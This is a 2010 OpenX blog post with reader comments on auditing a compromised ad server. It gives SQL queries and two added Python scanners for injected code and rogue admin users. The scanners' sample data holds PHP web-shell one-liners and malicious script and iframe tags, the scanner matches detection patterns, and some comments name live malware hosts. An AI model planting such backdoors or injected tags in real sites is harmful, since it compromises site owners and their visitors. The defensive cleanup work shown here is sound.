
OpenX Blog

Security Update: How to Secure your OpenX installation

Tags: OpenX
by Chris Nutting on September 17th, 2010

We have recently resolved a number of security vulnerabilities in the downloadable version of OpenX. The latest release, 2.8.7, is available here (or mirror).

As with any downloadable open-source software, it is important to update it when new releases come out to keep your system secure. Upgrading to the latest version of OpenX closes all known security issues.

After you upgrade to 2.8.7, you still need to perform a full security audit. The new release closes the vulnerabilities, but it does not undo anything an attacker did while your installation was exposed: injected code in the database, extra user accounts and dropped files all survive the upgrade and have to be found and removed by hand.

First, check the append/prepend fields in the banners and zones tables for any malicious code. Whatever is stored in these fields is emitted around every banner served from that row or zone, which is why injected JavaScript or iframes there reach every page showing your ads. (If your installation uses a table prefix such as ox_, add it to the table names in the queries below.)

SELECT bannerid, append, prepend FROM banners WHERE append != '' OR prepend != '';

SELECT zoneid, append, prepend FROM zones WHERE append != '' OR prepend != '';

If you see anything suspicious in those fields, clear those values out. Check each row before you do, since legitimate append/prepend code that you added yourself will appear in the same results.


Second, check that no unexpected admin users have been created. This query lists the details of all users with admin access in your system (review the full users table as well, since an attacker may also have created accounts with lesser roles):

SELECT u.user_id, u.contact_name, u.email_address, u.username FROM users AS u, account_user_assoc AS aua WHERE u.user_id=aua.user_id AND aua.account_id = (SELECT value FROM application_variable WHERE name='admin_account_id');
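As an added example (not code from the original post or from OpenX), the Python script below runs the two database checks above against a database connection. sqlite3 with a constructed schema stands in for the MySQL database so that it runs offline; the table prefix parameter, the pattern list used to flag values, and the sample rows are assumptions for the demonstration, while the SQL itself is the post's own. It also adds a targeted clean-up that blanks only the flagged rows, a narrower version of the blanket UPDATE several commenters propose further down.

```python
"""Audit an OpenX database for the indicators in the first two steps above.

Added example, not OpenX's own code. The SQL is the post's own audit queries,
parameterised on an assumed table prefix (some installs use one such as ox_;
the post's queries assume none). sqlite3 with a constructed schema stands in
for MySQL so this runs offline; on a real install pass a MySQLdb or
mysql.connector connection instead (its placeholder is %s rather than ?).
"""
import re
import sqlite3

# Patterns the post and its comments report inside injected append/prepend
# values (assumed list). A match is a lead for a human to review, not proof.
SUSPICIOUS = re.compile(
    r"<script|<iframe|eval\s*\(|base64_decode|document\.write|fromCharCode",
    re.IGNORECASE,
)


def audit_append_prepend(conn, prefix=""):
    """Step 1: non-empty append/prepend values in banners and zones.

    Returns (table, row_id, field, value, looks_malicious) tuples. Code you
    added yourself shows up here too, hence a per-row flag, not a verdict.
    """
    findings = []
    for table, id_col in (("banners", "bannerid"), ("zones", "zoneid")):
        sql = (f"SELECT {id_col}, append, prepend FROM {prefix}{table} "
               "WHERE append != '' OR prepend != ''")
        for row_id, append, prepend in conn.execute(sql):
            for field, value in (("append", append), ("prepend", prepend)):
                if value:
                    findings.append((table, row_id, field, value,
                                     bool(SUSPICIOUS.search(value))))
    return findings


def list_admin_users(conn, prefix=""):
    """Step 2: every user attached to the admin account (the post's query)."""
    sql = (f"SELECT u.user_id, u.contact_name, u.email_address, u.username "
           f"FROM {prefix}users AS u, {prefix}account_user_assoc AS aua "
           f"WHERE u.user_id = aua.user_id AND aua.account_id = "
           f"(SELECT value FROM {prefix}application_variable "
           f"WHERE name = 'admin_account_id')")
    return conn.execute(sql).fetchall()


def clear_injected(conn, prefix="", dry_run=True):
    """Blank append/prepend only on rows flagged by audit_append_prepend.

    Narrower than a blanket UPDATE, which also wipes legitimate hand-written
    code. Returns {table: [ids]} cleared (or that would be, when dry_run).
    """
    hits = {}
    for table, row_id, _f, _v, malicious in audit_append_prepend(conn, prefix):
        if malicious:
            hits.setdefault(table, set()).add(row_id)
    if not dry_run:
        for table, ids in hits.items():
            id_col = "bannerid" if table == "banners" else "zoneid"
            marks = ",".join("?" * len(ids))
            conn.execute(f"UPDATE {prefix}{table} SET append = '', prepend = '' "
                         f"WHERE {id_col} IN ({marks})", tuple(sorted(ids)))
        conn.commit()
    return {table: sorted(ids) for table, ids in hits.items()}


def build_sample_db(prefix="ox_"):
    """Constructed sample data: one injected banner, one legitimate prepend,
    one injected zone, and a rogue account attached to the admin account."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {prefix}banners (bannerid INTEGER PRIMARY KEY,
            append TEXT NOT NULL DEFAULT '', prepend TEXT NOT NULL DEFAULT '');
        CREATE TABLE {prefix}zones (zoneid INTEGER PRIMARY KEY,
            append TEXT NOT NULL DEFAULT '', prepend TEXT NOT NULL DEFAULT '');
        CREATE TABLE {prefix}users (user_id INTEGER PRIMARY KEY,
            contact_name TEXT, email_address TEXT, username TEXT);
        CREATE TABLE {prefix}account_user_assoc (account_id INTEGER, user_id INTEGER);
        CREATE TABLE {prefix}application_variable (name TEXT, value TEXT);
        INSERT INTO {prefix}banners VALUES
            (1, '<script src="http://tds.example.invalid/in.js"></script>', ''),
            (2, '', '<!-- house tracking pixel, added by us -->');
        INSERT INTO {prefix}zones VALUES
            (5, '', '<iframe src="http://example.invalid/in.cgi" width=1 height=1></iframe>'),
            (6, '', '');
        INSERT INTO {prefix}users VALUES
            (1, 'Site Admin', 'admin@example.invalid', 'admin'),
            (2, 'Advertiser', 'adv@example.invalid', 'adv'),
            (3, '', '', 'sys_backup');
        INSERT INTO {prefix}account_user_assoc VALUES (1, 1), (7, 2), (1, 3);
        INSERT INTO {prefix}application_variable VALUES ('admin_account_id', '1');
    """)
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for finding in audit_append_prepend(db, "ox_"):
        print("append/prepend:", finding)
    for user in list_admin_users(db, "ox_"):
        print("admin user:", user)
    print("would clear:", clear_injected(db, "ox_", dry_run=True))
```

Run it with dry_run left at True first and read the flagged values yourself. On a live install, take a database dump before clearing anything, and keep a copy of the injected values: the hostnames in them are what you will search for in the filesystem and the audit table afterwards.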

Third, check for infected files on the filesystem.

Installing the latest version of OpenX restores all core files, but plugin files (which the installer copies over from the previous version) and files in the www/images folder are carried forward unchanged, so they should be double-checked after the upgrade is complete, together with the var/ directory, where the cache files and compiled templates live.


In particular, be on the lookout for base64_decode and/or eval statements in your PHP files. In the notes on the bug “Arbitrary code injected into cache file” (https://developer.openx.org/jira/browse/OX-5950), users have reported specific PHP files, but the injection can occur in any PHP file. A hit is a lead rather than proof: legitimate code also calls base64_decode, so compare any flagged file against the same file in a freshly unpacked copy of the 2.8.7 release before deciding it is malicious, and treat any PHP file that has no counterpart in the fresh copy as suspect.
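An added example of the file check (not OpenX's code): the Python script below walks an installation, flags PHP files containing eval or base64_decode, plus two wrappers commonly found around them, gzinflate and str_rot13 (an assumption beyond the two markers the post names), flags any file under www/images that contains a PHP open tag, and then compares each flagged file with the same path in a pristine unpacked copy of the release so that a legitimate core call is told apart from a tampered or dropped file. The directory layout and file contents are constructed sample data.

```python
"""Scan an OpenX tree for the code-injection markers named in step 3 above.

Added example, not OpenX's own code. Flags PHP files containing eval or
base64_decode (the post's markers) or the gzinflate/str_rot13 wrappers often
seen around them (an assumption), flags any file under www/images holding a
PHP open tag, and compares each hit with a pristine copy of the release so a
legitimate core call is not mistaken for an injection. Sample trees are
constructed in a temporary directory.
"""
import hashlib
import os
import re
import tempfile

MARKER_RE = re.compile(rb"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(")
IMAGE_DIR = "www/images/"   # image folders should contain no PHP at all


def _sha256(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def scan_tree(root):
    """Return [{"path", "markers"}] for suspicious files, paths relative to root
    with forward slashes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            markers = sorted({m.decode() for m in MARKER_RE.findall(data)})
            if rel.startswith(IMAGE_DIR) and b"<?php" in data:
                markers.append("php_in_images")
            if markers and (name.endswith(".php") or "php_in_images" in markers):
                findings.append({"path": rel, "markers": markers})
    return sorted(findings, key=lambda f: f["path"])


def classify(findings, root, clean_root):
    """Label each hit by comparing it with the same path in a pristine copy:
    same_as_clean (legitimate core code), modified (tampered file), or
    missing_in_clean (a dropped file, e.g. a backdoor under www/images)."""
    for f in findings:
        parts = f["path"].split("/")
        clean_path = os.path.join(clean_root, *parts)
        if not os.path.isfile(clean_path):
            f["status"] = "missing_in_clean"
        elif _sha256(clean_path) == _sha256(os.path.join(root, *parts)):
            f["status"] = "same_as_clean"
        else:
            f["status"] = "modified"
    return findings


def audit(root, clean_root):
    """Scan the live tree and classify every hit against the pristine copy."""
    return classify(scan_tree(root), root, clean_root)


def build_sample_trees():
    """Constructed sample: a pristine copy and a live install with one tampered
    core file, one dropped plugin file and PHP hidden inside an image."""
    base = tempfile.mkdtemp()
    files = {
        "clean/lib/bar.php": b"<?php return base64_decode($blob);\n",
        "clean/lib/foo.php": b"<?php echo 'ok';\n",
        "live/lib/bar.php": b"<?php return base64_decode($blob);\n",
        "live/lib/foo.php": b"<?php echo 'ok'; eval(base64_decode($_COOKIE['k']));\n",
        "live/plugins/etc/evil.php": b"<?php eval(gzinflate(base64_decode('...')));\n",
        "live/www/images/pixel.gif": b"GIF89a<?php eval($_POST['c']); ?>",
        "live/www/index.php": b"<?php require 'lib/foo.php';\n",
    }
    for rel, data in files.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return os.path.join(base, "live"), os.path.join(base, "clean")


if __name__ == "__main__":
    live, clean = build_sample_trees()
    for hit in audit(live, clean):
        print(f"{hit['status']:16} {hit['path']}  {', '.join(hit['markers'])}")
```

The status column is what saves time: same_as_clean hits can be dismissed without reading them, while every modified or missing_in_clean file deserves a look even if it lives outside the plugins and www/images folders the post singles out.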



Optional steps you can take to secure your system are:

To be notified of any future security updates, please sign up for the OpenX Newsletter and add alerts@openx.org to your address book.

As always, please let us know of any potential security problems by emailing security@openx.org.

27 Comments

  1. Hi, we have our account in openx, and since yesterday (16-sept-2010) our banners are still showing, even when they have been deactivated. Please do something!!!!

    Comment by Santiago — September 17, 2010 @ 10:13 am

  2. I upgraded and followed these instructions, but I’m still receiving the openx http://85.234.190.12/tds/in.cgi?default warning and thus I had to take my banners down again.

    Is there a fix to this??!

    Comment by harry — September 17, 2010 @ 2:02 pm

  3. Do you have anyone there who answers the form to mail request? I have sent in several request over the last few days with no reply. I am needing assistance please with the upgrade. I also would like more information on other services you offer. Please advise. Unfortunately, I don’t have time to dig around the forums for answers on your products and services.

    Comment by Duane — September 17, 2010 @ 9:10 pm

  4. I have followed every step for upgrading from 2.8.1 to 2.8.7. I have uploaded installation files for the update on server, put them in mysite.com/openx1, and when I entered the address mysite.com/openx1 in opera, openx directed to login menu, not the install menu. Please help, I’ve wasted the whole day on this issue.

    Comment by Alex — September 17, 2010 @ 9:21 pm

  5. Same issue as Darco and Fixo and Mike with plugins. This is so frustrating. I tried to do a clean install for version 2.8.7 and again had the issue with plugins. So my update from 2.8.5 to 2.8.7 failed, and a new install failed; the reason in both cases is the plugins, and I don’t use any custom plugins, only the ones that are in by default, so it seems that the install is broken.

    Comment by Vlad — September 18, 2010 @ 1:29 am

  6. Santiago – There was a minor issue affecting the free community hosted servers which was preventing changes from being pushed out, this was resolved yesterday morning and was unrelated to the security issues.

    harry – You need to identify and scrub the ad/zone which is serving up that malware. The SQL queries provided in this post check the banners/zones append and prepend fields, but you may also need to check the htmltemplate/htmlcache fields in the banners table for malware.

    Note that it is *very* important to follow all the steps in the upgrade instructions: http://www.openx.org/en/docs/upgrading-openx

    Simply unpacking the openx-2.8.7.zip file over your existing installation and running through the upgrader is not enough to secure your system.

    If the installer has problems installing the plugins, it should have presented you with a message detailing what issues were found, this information should also be present in the /path/to/openx/var/install.log file. You can also try to (re)install the default plugins directly via the UI (the .zip files for which can be found inside the openx-2.8.7.zip file in the etc/plugins folder)

    Comment by Chris Nutting — September 19, 2010 @ 1:05 am

  7. I found a huge list in the field append with the malicious script.
    SELECT bannerid, append, prepend FROM banners WHERE append != '' OR prepend != '';

    Can anybody suggest a MySQL query to delete all the scripts at once?
    Deleting them one by one will take ages.

    Many thanks!

    Comment by Lee — September 19, 2010 @ 11:49 am

  8. Can you please explain step by step how to reinstall the default plugins? I see them in etc/plugins, but I need instructions on how to reinstall them. I had no problems upgrading or installing OpenX versions until now. A clean install of OpenX 2.8.7 is failing with two plugins, and the upgrade from 2.8.5 is just removing them all. I would hate for my server to get infected just because there is no instruction or manual on how to install plugins when the default installation fails. I tried and failed several times to upgrade or to install a fresh OpenX 2.8.7. Also, is it possible to get links for upgrading and installing OpenX that are current, since there is always a difference between the readme file and the current upgrade process? For example, should a folder name be changed before or after running the wizard? There is nothing about whether the plugin folder should be copied or whether the wizard will copy those files. Should you use a full path from the root folder on a Linux system or something else, since a full path fails when the wizard asks for the old installation of OpenX?
    Thanks in advance

    Comment by Vlad — September 20, 2010 @ 3:47 am

  9. UPDATE banners SET append = '', prepend = '' WHERE append != '' OR prepend != '';

    Will empty the prepend and append fields where there is currently something in it.

    Comment by Dan Mansfield — September 20, 2010 @ 2:12 pm

  10. We had malware javascript injected directly into our most popular HTML ad itself, I would also suggest looking at:

    select bannerid, htmltemplate from banners order by updated desc limit 10

    or something thereabouts to check for recent changes to your banners themselves, not just the append/prepend into zones. This was inserted via a backdoor dropped into our www/images/layerstyles directory tree before we upgraded to 2.8.7, but not activated until after we upgraded, so make sure you follow the advice to check your images & cache directory for backdoors even if you’ve already upgraded. This tool: http://www.rfxn.com/projects/linux-malware-detect/ found the backdoor that was installed.

    Comment by Jason — September 20, 2010 @ 4:34 pm

  11. We’ve used OpenX for years. This latest security threat came out of nowhere and hit us hard. 72 hours later, we’re working hard to get relisted as a safe site with Google. It’s tanked our traffic today.

    We found the solution, though: after upgrading, over 5,000 files were infected in the phpads_audit details column. Have your developers start their search there.

    A sample search and results (x8 domains on our end, over 5,000 lines were removed:)

    mysql> update phpads_audit set details='' where details like '%blamesllek%';
    Query OK, 1262 rows affected (0.36 sec)
    Rows matched: 1262 Changed: 1262 Warnings: 0

    Hope this helps anyone else dealing with this issue.

    Comment by Kevin McNeese — September 20, 2010 @ 10:42 pm

  12. If you are sure that all the JavaScript code in the append & prepend fields is bad, try these MySQL queries:
    1) SELECT bannerid, append, prepend FROM banners WHERE append != '' OR prepend != '';
    use this: UPDATE banners SET append='', prepend='' WHERE append != '' OR prepend != '';

    2) SELECT zoneid, append, prepend FROM zones WHERE append != '' OR prepend != '';
    use this: UPDATE zones SET append='', prepend='' WHERE append != '' OR prepend != '';

    Comment by adiva — September 21, 2010 @ 3:56 pm

  13. I appear to have a fake user in the users table, although not as an admin, but a manager. I can’t seem to find them through the web interface, so how do I delete them?
    Thanks!

    Comment by Kramer — September 22, 2010 @ 2:07 pm

  14. Just a tip for anyone working on this issue. The above documentation will not fix your site in a step-by-step way. I am still working on fixing a site. Also, Google has listed us as an attack site; we cleaned up what we thought was all of the malware and told Google to review, and 2 days later we are still listed as an attack site.

    We had malware in the database tables ox_audit (“details” column), ox_banners (append, prepend columns) and ox_zones (append, prepend columns). There were also malware entries in the tables named… ox_z_09be4005dcccc520

    It seems like it is not very consistent in how it infects people’s sites. Maybe that is why it is such a good attack, as it’s hard to clean up.

    I have run iscanner, and linux malware detect v1.3.6. iscanner comes up with some issues, but I am not sure that they are serious as when I run the same scan on the original code of open-x it reports the same issues.

    Here are results when I scan.

    Starting iScanner 0.7 on [server] at (Thu Sep 23 20:44:31 2010)
    Copyright (C) 2010 iSecur1ty

    [*] Locating files (extentions: htm, html, php, js). please wait…
    [*] Scanning [3245] files found. (db:0.2.0 – 22/Sep/2010)

    [!] Scanned file: /home/sitename/www/site/www/admin/templates/install/tracker.html
    Signature: [id:1.0] (<iframe.+?(?:visibility\s*:\s*hidden|display\s*:\s*none|style\s*=\s*['\"]?hidden|\s(?:width|height)\s*=\s*['\"]?[01][\'"\s]).+?)
    Description: Hidden iframe tag detected.

    [!] Scanned file: /home/sitename/www/ads.sitename.com/lib/smarty/plugins/function.mailto.php
    Signature: [id:2.1] (<script.+?eval\s*\(\s*unescape.+?\).*?)
    Description: Javascript ‘eval’ and ‘unescape’ functions detected, possible obfuscated malicious code.

    [!] Scanned file: /home/sitename/www/ads.sitename.com/var/20100922_old.ads.sitename.com.conf.php
    Signature: [id:4.0] ((?:shellcode|(?:LPORT|EXITFUNC|Encoder)=))
    Description: Dangerous word detected, CHECK THE FILE!

    [!] Scanned file: /home/sitename/www/ads.sitename.com/var/ads.sitename.com.conf.php
    Signature: [id:4.0] ((?:shellcode|(?:LPORT|EXITFUNC|Encoder)=))
    Description: Dangerous word detected, CHECK THE FILE!

    [!] Scanned file: /home/sitename/www/ads.sitename.com/var/templates_compiled/%%F4^F43^F4358000%%tracker.html.php
    Signature: [id:1.0] (<iframe.+?(?:visibility\s*:\s*hidden|display\s*:\s*none|style\s*=\s*['\"]?hidden|\s(?:width|height)\s*=\s*['\"]?[01][\'"\s]).+?)
    Description: Hidden iframe tag detected.

    [*] Scan finished in (8) seconds, [5] suspicious files found.
    Please check “infected-20:44:31-23.Sep.log” for details.

    Malware detect did not pick anything up when scanning on our site. Not sure if anyone has feedback on the above scan, but it would be helpful.

    Comment by Wes — September 24, 2010 @ 2:53 am

  15. This just got us too. We were on 2.8.5 and have now been marked as an attack site (which is a real pain to fix, since requesting a review from Google seems to go into a black hole – simply no feedback).

    We had about 30 backdoor scripts spread around the plugins folders, and all banners got appended with malicious code with iframes pointing to djbkzbk.co.cc This seems to have been orchestrated from Belarus, near Minsk, if the IP addresses are to be believed.

    We have upgraded to 2.8.7, removed what we can, but are still searching the sites for other backdoor scripts that may have been allowed through.

    One thing I am not sure about: the iframes in the “audit” table’s “details” column – do they also need to be removed, or are they just a history of what happened? So far as I can see, the only reason they are in the audit table is because we removed the JavaScript through the admin screens.

    We did not get any new users or accounts created, so far as I can see.

    This has shaken me a little, because I thought OpenX was past this sort of thing. Looking through the code today I can see two major things that are just asking for this kind of trouble. Firstly, read all input from ONE PLACE. We are a decade past PHP applications that should be sprinkled with GET and POST references. Just DON’T DO THAT. Filter all input through a single point where validation can be applied at source.

    Secondly – database bind variables. Why has this escaped the OpenX developers for so long? The product is scattered with database queries with PHP variables in the query strings. Again – PHP development got past this type of thing many years ago. Bind your data into your queries at the last moment – do it in one place that handles it all consistently and just once.

    Please OpenX – I am annoyed, but only for your own sake. Fix those two things and you will remove 99% of all present and future vulnerabilities. Doing it the way you are now is just leaving the gate open to silly mistakes that let the hackers ride straight in. The functionality is great – but the back end code needs a little more thought *before* you roll out more features in the next version.

    Comment by Jason Judge — September 24, 2010 @ 10:14 pm

  16. [...] the solution to the problem, dating from 17 September, is perfectly documented here. One more example of the effectiveness of open-source tools compared with proprietary ones [...]

    Pingback by Troyanos, exploit's y malware en OpenX | Weblog personal de Enrique Castro — September 25, 2010 @ 3:03 pm

  17. Upgraded to 2.8.7 a week ago and I already found JS code in the append & prepend fields! It looks like there’s no other option than changing product…

    Comment by Peppos — September 26, 2010 @ 6:04 pm

  18. [...] serious vulnerabilities were detected last week in the well-known advertising management system [...]

    Pingback by Blog Oficial da PTServidor » Vulnerabilidades de segurança no OpenX — September 26, 2010 @ 11:53 pm

  19. This has happened to us about 3 times. We’ve upgraded and applied all the security measures but the hassle isn’t worth it. As another commenter mentioned, it seems there are backdoors in OpenX. We’re looking for alternative products.

    Comment by Uno — September 28, 2010 @ 10:01 am

  20. We have also had this happen three times now and are looking at Google’s DFP Small Business. This is just getting ridiculous.

    OpenX told me their enterprise product is safe and secure. So, why can’t they seem to make the community one safe?

    Has anyone found that locking down their Apache server has prevented this from happening again? Does that work? Someone is getting in and creating new user accounts and adding appends to ads.

    Comment by Steve — September 28, 2010 @ 11:37 am

  21. Same problem here. Got listed as an attack site with Google. Few $1000 damage. Upgraded to 2.8.7. Cleaned the database, searched for malicious users.

    Put the ads back on.

    It took 5 hours and we’re blacklisted again. Database is infected again.

    I’m sick and tired of this. There must be other vulnerabilities or backdoors.

    Switching to another product this evening.

    Comment by Richard — September 30, 2010 @ 12:58 pm

  22. [...] OpenX users are also encouraged to review the “How to Secure your OpenX Installation” blog entry on how to further secure the OpenX [...]

    Pingback by TechsRUs Blog » Foxit Releases Foxit Reader 4.2 — October 7, 2010 @ 3:03 pm

  23. Real shame – I was totally happy until this… gonna look for a different banner server option now :(

    Comment by Em See — October 10, 2010 @ 6:30 am

  24. I really enjoyed OpenAds, then coming to OpenX, however their lack of focus on the Community Product is starting to show. This latest security exploit whereby they still have not solved the problem shows that they are no longer serious about their “Open Source” and “community” product.

    Comment by Joel — October 12, 2010 @ 9:34 am

  25. I found iframes also in the “audit” table, prepend/append columns.

    Comment by Mihaela — October 15, 2010 @ 9:49 am

  26. My tube site sogayporn.com was compromised, cleared the entire database, and did a clean 2.8.7 reinstall, and all is going great :)

    Comment by sogayporn — October 19, 2010 @ 8:54 pm

  27. This is the third time that I’m caught with this kind of problem, so they fix but don’t fix.

    For those that don’t really use the append or prepend, why doesn’t OpenX just offer a configuration option to take that out of the code?

    Does anyone know how to remove them on the code?

    Comment by Ricardo — October 20, 2010 @ 3:21 pm
